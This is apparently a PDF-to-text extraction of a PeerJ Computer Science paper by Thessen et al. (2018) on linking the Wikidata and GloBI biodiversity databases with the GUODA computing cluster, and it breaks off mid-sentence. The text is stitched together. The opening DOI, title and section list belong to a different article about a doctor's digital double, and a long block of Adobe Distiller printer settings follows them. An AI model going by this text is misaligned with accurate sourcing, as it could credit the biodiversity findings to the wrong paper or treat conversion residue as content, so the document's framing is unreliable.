http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ The doctor’s digital double: how warmth, competence, and animation promote adherence intention Introduction Methods Results Discussion Conclusions Appendix A: Script Appendix B: Indices flink8 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_sznadejg4faflibuhqbxnvyuyy ---- Submitted 17 May 2018 Accepted 29 August 2018 Published 17 September 2018 Corresponding author Anne E. Thessen, annethessen@gmail.com Academic editor Alessandro Frigeri Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.164 Copyright 2018 Thessen et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS 20 GB in 10 minutes: a case for linking major biodiversity databases using an open socio-technical infrastructure and a pragmatic, cross-institutional collaboration Anne E. Thessen1,5, Jorrit H. Poelen2, Matthew Collins3 and Jen Hammock4 1 Ronin Institute for Independent Scholarship, Montclair, NJ, USA 2 Independent consultant, Oakland, CA, USA 3 University of Florida, Gainsville, FL, USA 4 National Museum of Natural History, Washington, DC, USA 5 Oregon State University, Corvallis, OR, USA ABSTRACT Biodiversity information is made available through numerous databases that each have their own data models, web services, and data types. Combining data across databases leads to new insights, but is not easy because each database uses its own system of identifiers. In the absence of stable and interoperable identifiers, databases are often linked using taxonomic names. This labor intensive, error prone, and lengthy process relies on accessible versions of nomenclatural authorities and fuzzy-matching algorithms. To approach the challenge of linking diverse data, more than technology is needed. New social collaborations like the Global Unified Open Data Architecture (GUODA) that combines skills from diverse groups of computer engineers from iDigBio, server resources from the Advanced Computing and Information Systems (ACIS) Lab, global-scale data presentation from EOL, and independent developers and researchers are what is needed to make concrete progress on finding relationships between biodiversity datasets. This paper will discuss a technical solution developed by the GUODA collaboration for faster linking across databases with a use case linking Wikidata and the Global Biotic Interactions database (GloBI). The GUODA infrastructure is a 12-node, high performance computing cluster made up of about 192 threads with 12 TB of storage and 288 GB memory. Using GUODA, 20 GB of compressed JSON from Wikidata was processed and linked to GloBI in about 10–11 min. Instead of comparing name strings or relying on a single identifier, Wikidata and GloBI were linked by comparing graphs of biodiversity identifiers external to each system. This method resulted in adding 119,957 Wikidata links in GloBI, an increase of 13.7% of all outgoing name links in GloBI. Wikidata and GloBI were compared to Open Tree of Life Reference Taxonomy to examine consistency and coverage. The process of parsing Wikidata, Open Tree of Life Reference Taxonomy and GloBI archives and calculating consistency metrics was done in minutes on the GUODA platform. As a model collaboration, GUODA has the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing How to cite this article Thessen et al. (2018), 20 GB in 10 minutes: a case for linking major biodiversity databases using an open socio- technical infrastructure and a pragmatic, cross-institutional collaboration. PeerJ Comput. Sci. 4:e164; DOI 10.7717/peerj-cs.164 https://peerj.com mailto:annethessen@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.164 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.164 resources that are accessible from a laptop or desktop. However, participating in such a collaboration still requires basic programming skills. Subjects Bioinformatics, Databases Keywords Biodiversity, Collaboration, Identifiers, Wikidata, Graph, Linking INTRODUCTION Biodiversity databases provide global access to information about species via the Web. These databases contain information as varied as observation records, text descriptions, images, maps, genetic sequences, phylogenetic trees, and trait data (Table 1). All of these data become much more useful if they can be linked. Many biodiversity databases share information with each other (Bingham et al., 2017), but creating the links can be very difficult for several reasons including the size of the databases, the heterogeneous nature of the data, and the heterogeneous nature of the identifiers used by the different resources (Page, 2008). The more popular methods for linking biodiversity databases include taxonomic names, LSID (Life Sciences Identifier), and DOI (Digital Object Identifier). The Encyclopedia of Life uses taxonomic names to automatically aggregate data from hundreds of providers (Parr et al., 2014). BioNames links data using LSID, DOI, handles, bibliographic citations, and taxonomic names (Page, 2013). The iPhylo LinkOut service mapped identifiers used by the NCBI taxonomy database (which provides the taxonomic backbone for GenBank) to Wikipedia pages using taxonomic names, including synonyms (Page, 2011). TBMap provides links from TreeBase across several taxonomic databases, such as ITIS and NCBI (Page, 2007). This mapping was also achieved using taxonomic names, but in some cases GenBank Accession numbers and museum specimen codes were available for supplement. The use of taxonomic names to aggregate data can lead to errors and requires significant a priori knowledge either in the form of curators or an authoritative nomenclature. Many databases expose their own internal identifiers, such as the WoRMS Aphia ID, so others can link their data to those resources within their own systems, often by providing a URL. Databases like WoRMS provide web services that allow users to look up an identifier for a taxon in question, one at a time. While this makes linking easier, it is still difficult to scale across all databases. For example, a list of all the taxon identifiers in EOL is 300 MB compressed. No system of identifiers is universal across biodiversity databases and none of them are easy to implement at scale. While the data would be much more useful if linked, there is a lack of tools for linking data across databases at scale. Most mappings are done at great expense and then are made available as a separate file or incorporated into the resources themselves. LinkOut, BioNames, GBIF, and EOL take more than a day to link across their entire body of aggregated content. This paper discusses links made between GloBI and Wikidata (WD) in 10 min using GUODA, a high performance computing system available for analysis of large biodiversity data sets. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 2/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.164 Table 1 Selected biodiversity databases and their size. Database Data Quantity (Jan 2018) Size (compressed) GBIF 964,547,793 occurrence records 139 GB Catalogue of Life/ITIS 1.7 million taxa 2.9 GB GloBI 3,363,528 interactions 206 MB iDigBio 106,922,498 specimen records 35.5 GB GenBank 206,293,625 sequences 3 TB Biodiversity Heritage Library 53,739,062 pages 2.7 GB WoRMS 243,323 marine species 71 MB OpenTree 2,722,024 taxa and 6,810 trees 189 MB EOL TraitBank Over 11 million records 46 GB uncompressed EOL 7,705,748 data objects (May 2017) 10 TB uncompressed Wikidata 42,648,426 data items 20 GB METHODS Description of Resources GUODA Following an iDigBio hack-a-thon in June 2015, GUODA was created as a pragmatic way to compute over multiple large biodiversity databases in a mutually beneficial collaboration between iDigBio, EOL, Kew Garden, and independent developers. Catalyzed by various presentations at conferences, hardware provided by ACIS, 20+ meetings, and several prototypes (e.g., http://effechecka.org, https://gimmefreshdata.github.io), a general access biodiversity data integration and analysis environment was created. This environment, with the aggregated experience and perspectives of all the collaborators, was used to produce the results of this paper. Housed at the ACIS Lab at the University of Florida, the GUODA infrastructure consists of 12 IBM HS22 blades each with 8 cores, 24 GB of memory, and 1 TB of storage each. This makes a total of 192 threads, 288 GB of memory and 12 TB of disk space available for processing jobs using Apache Spark (Fig. 1; Zaharia et al., 2016). The cluster is managed under Apache Mesos (Hindman et al., 2011) which is a distributed scheduling system for periodic jobs. For long running processes, such as web APIs or databases, the Marathon (https://github.com/mesosphere/marathon) framework is run within Mesos. Marathon facilitates running always-up services with monitoring, automatic deployment of code, re-scaling to multiple nodes, and other management features. Mesos is responsible for accepting requests to start Spark frameworks, processes which do the actual computation and may span multiple servers, and allocation of resources requested by the framework. Hadoop HDFS (Shvachko et al., 2010) is installed outside of Mesos directly on all 12 nodes of the cluster and provides redundant parallel shared storage to all nodes as well as the Jupyter notebook (Kluyver et al., 2016) server that provides a programming interface to end users. Each node has 1 TB of local disk storage for a total of about 3.5 TB of usable storage space for data files in Apache Parquet format. Spark is aware of the placement of data on an HDFS cluster and will divide processing among nodes in a way that prefers to read and write data that is local to the node to minimize network traffic. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 3/15 https://peerj.com http://effechecka.org https://gimmefreshdata.github.io) https://github.com/mesosphere/marathon http://dx.doi.org/10.7717/peerj-cs.164 Figure 1 GUODA Infrastructure. Data from biodiversity databases is loaded into GUODA as Parquet files (Storage). When a user working in a Jupyter Notebook (Front-end Server) triggers a job interactively or via GitHub and Jenkins, the data are analyzed using Apache Spark (Compute Cluster). This infrastruc- ture allows a user working from a laptop or desktop to compute over multiple biodiversity databases at once. All logos are provided by the organizations they represent and are used with permission. Full-size DOI: 10.7717/peerjcs.164/fig-1 Wikidata Wikidata (WD) is a free and open knowledge base that provides structured data for WikiMedia projects (http://www.wikidata.org; Vrandečić & Krötzsch, 2014). Similar to Wikipedia, anyone can read or edit the resource. Information, including links to other resources, can be added to Wikidata using bots and batch imports through their Data Import Hub (https://www.wikidata.org/wiki/Wikidata:Data_Import_Hub). Wikidata information about taxa can be conceptualized as a graph linking related taxa to each other and identifiers from other databases to the taxa they represent (Fig. 2). Every taxon in Wikidata is issued a Wikidata identifier. While a public Wikidata SPARQL endpoint and associated tools (Voß, 2016) exist, these APIs are not suitable for batch processing. For example, when attempting to retrieve all taxa using the public SPARQL endpoint, a query timeout error was reported. In addition, the APIs are expected to return different results over time, so reproducing results is difficult if not impossible. This is why we used a JSON archive to access Wikidata (Wikidata, 2018). GloBI GloBI is a database of biotic interactions recorded as Organism_1:has_relationship: Organism_2 (Poelen, Simons & Mungall, 2014) per individual interaction observation or claim. GloBI uses a combination of web APIs, taxon archives, and name correction/parsing methods in an attempt to link names from species interaction datasets to existing sources. Spatial, temporal, and taxonomic coverage in GloBI is sparse and unevenly distributed (see Eltonian shortfall, Hortal et al., 2015), with spatial concentrations in Europe and North America and taxonomically concentrated in Arthropods, Fungi, and Plants. Only 8% of Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 4/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-1 http://www.wikidata.org https://www.wikidata.org/wiki/Wikidata:Data_Import_Hub http://dx.doi.org/10.7717/peerj-cs.164 Figure 2 Frequency of Wikidata taxa linked to biodiversity databases. This graph shows the propor- tion of the approximately 2.3 million Wikidata taxa with zero, one, two, etc. links to external biodiversity databases (NCBI, ITIS, GBIF, EOL, FishBase, Index Fungorum and iNaturalist). The majority of Wikidata taxa had at least two links. A little more than 15% of Wikidata taxa had no links to external biodiversity databases. Full-size DOI: 10.7717/peerjcs.164/fig-2 taxa in ITIS are also in GloBI. A detailed technical description of the GloBI data model and services has been published elsewhere (Poelen, Simons & Mungall, 2014). GloBI maintains a graph of related taxa and their identifiers from different databases (Poelen, Simons & Mungall, 2014). GloBI does not introduce its own taxon IDs. Instead, it records how names were mapped from a source name into an external taxonomic database using a taxon graph (see https://globalbioticinteractions.org/references). We used GloBI Taxon Graph v0.4.2 (Poelen, 2018b). This taxon graph links names and identifiers hierarchically and across resources. Open Tree of Life Reference Taxonomy To assess taxonomic ID coverage, the taxa in Wikidata and GloBI were compared to Open Tree of Life Reference Taxonomy (OTT 3.0; http://files.opentreeoflife.org/ott/ott3.0/ott3. 0.tgz; Rees & Cranston, 2017). OTT was built using an automated algorithm with informed choices to aggregate and link existing naming authorities into a reasonably comprehensive, artificial, taxonomy. OTT contains 4,385,000 external links for 3,594,550 taxa aggregated and linked over five authorities (i.e., GBIF, IF, SILVA, WoRMS, NCBI). Linking Wikidata And GloBI Both Wikidata and GloBI have taxon graphs that map to identifiers from external databases (e.g., NCBI, ITIS, GBIF, EOL, Index Fungorum (IF), Fishbase and WoRMS). A Wikidata dump was loaded into GUODA and processed to extract taxon items (about 2.3 million) Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 5/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-2 https://globalbioticinteractions.org/references http://files.opentreeoflife.org/ott/ott3.0/ott3.0.tgz http://files.opentreeoflife.org/ott/ott3.0/ott3.0.tgz http://dx.doi.org/10.7717/peerj-cs.164 Figure 3 Mapping taxon graphs across resources. Both GloBI and Wikidata contain hierarchical taxon graphs with each taxon having a ‘‘star’’ of external identifiers. The taxa are mapped across these resources by comparing the portion of the graph with the external identifiers between nodes. In this example, the names and identifiers match perfectly, so a relationship between Panthera leo in GloBI and Panthera leo in Wikidata is inferred. Full-size DOI: 10.7717/peerjcs.164/fig-3 and their links to NCBI, ITIS, GBIF, EOL, IF, Fishbase and WoRMS. This was the Wikidata taxon graph. This taxon graph was loaded into a lookup table where each row contained an NCBI, ITIS, GBIF, EOL, IF, Fishbase or WoRMS identifier and the corresponding Wikidata identifier. The GloBI taxon graph was already in a similarly formatted lookup table. The taxon graphs in GloBI and Wikidata were mapped to each other with a join of the NCBI, ITIS, GBIF, EOL, IF, Fishbase or WoRMS identifiers of the respective lookup tables (Fig. 3). So, for each external identifier that occurred in both Wikidata and GloBI, the corresponding Wikidata identifier inserted in the GloBI lookup table. For instance, consider Wikidata taxon item Q140 (https://www.wikidata.org/wiki/Q140 accessed on 30 March 2018; Panthera leo) points to ITIS:183803. With the matching algorithm used, GloBI now considers WD:Q140 to be linked to all taxon entries that are considered the same as, or synonymous to, ITIS:183803. This final joined graph was saved into HDFS as a Parquet file and linked entries were appended to GloBI Taxon Graph from v0.3.0 onward (Poelen, 2018c). In addition, the GloBI ingestion engine was updated to automatically perform the taxon graph matching for future updates. This linkage enabled lookups of diet items of lions by Wikidata identifier via https: //www.globalbioticinteractions.org/?interactionType=eats&sourceTaxon=WD%3AQ140 and facilitates future integration of species interaction data with Wikidata. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 6/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-3 https://www.wikidata.org/wiki/Q140 https://www.globalbioticinteractions.org/?interactionType=eats&sourceTaxon=WD%3AQ140 https://www.globalbioticinteractions.org/?interactionType=eats&sourceTaxon=WD%3AQ140 http://dx.doi.org/10.7717/peerj-cs.164 Taxon graph overlap and consistency OTT, Wikidata, and GloBI taxon graphs maintain links to GBIF, IF, NCBI and WoRMS identifiers (referred to as external identifiers). The taxon graphs are considered to (partially) overlap if individual taxon IDs from different graphs have at least one external identifier in common. In addition, a taxon graph is inconsistent if a taxon ID links to multiple external identifiers from the same identifier scheme. Similarly, overlapping taxon IDs are said to be inconsistent if they link to multiple external identifiers from the same identifier scheme. Where overlap is a measure for taxon graph similarity, consistency can be seen as a way to measure the relative quality of (overlapping) taxon graphs. For instance, let’s say that OTT:1087695 is linked to NCBI:191633, WoRMS:156905, and GBIF:1449280. In addition, WD:Q7247420 (https://www.wikidata.org/wiki/Q7247420) points to WORMS:156905, GBIF:1449280, and NCBI:191633. This would mean that links of these OTT and WD IDs overlap and are consistent, because they do not point to different names in same naming schemes (Fig. 4). However, when considering the GloBI taxon ‘‘ID’’ ‘‘GLOBI:null@Procladius sp1 M_PL_014’’, multiple links to external IDs were found (e.g., NCBI:1981571, NCBI:1981569, NCBI:1981572, NCBI:1981573, NCBI:1981574, NCBI:1981570). In this case, the GloBI taxon ID is inconsistent. The high number of external NCBI identifiers is due to the NCBI taxonomy containing many ‘‘provisional’’ taxa derived from environmental samples. Data access All of the input data sets can be found at: https://doi.org/10.5281/zenodo.755513 (GloBI Taxon Graph), http://files.opentreeoflife.org/ott/ott3.0/ott3.0.tgz (Open Tree of Life Taxonomy) http://doi.org/10.5281/zenodo.1211767 (Wikidata). A selection of intermediary and result datasets are available online (Poelen, 2018d; Poelen, 2018a). All of the scripts used to make the statements in the results can be found here (https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata) with instructions on how to duplicate the analysis. RESULTS After 10 min of processing, GloBI was linked to Wikidata using pre-existing identifier mappings. The Wikidata dump was 20 GB of compressed JSON with 40–50 million data items. It took about 10 min for GUODA to extract taxa (about 2.3 million) and their links in Wikidata and then less than one minute to map the Wikidata taxon graph to the GloBI taxon graph. The 119,957 WikiData links that were added to GloBI increased its outgoing name links by 13.7% (Poelen, 2018d). Eighty-seven percent (86.7%) of the external identifiers in Wikidata overlap with the external identifiers in OTT (Fig. 5). Eighty-six percent (86.1%) of the external identifiers in GloBI overlap with the external identifiers in OTT (Fig. 5). Wikidata provided mappings for 65.2% of the external identifiers in GloBI (Fig. 5). Out of the 77,000 external identifiers that occurred only in OTT and GloBI, only 56 were inconsistent (https://github.com/bio-guoda/guoda-datasets/blob/ master/wikidata/inconsistentNameIdsGloBI_OTT.tsv). These 56 links pointed to seven Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 7/15 https://peerj.com https://www.wikidata.org/wiki/Q7247420 https://doi.org/10.5281/zenodo.755513 http://files.opentreeoflife.org/ott/ott3.0/ott3.0.tgz http://doi.org/10.5281/zenodo.1211767 https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentNameIdsGloBI_OTT.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentNameIdsGloBI_OTT.tsv http://dx.doi.org/10.7717/peerj-cs.164 Figure 4 Inconsistent graph matching. When overlapping taxon graphs include multiple name strings, the 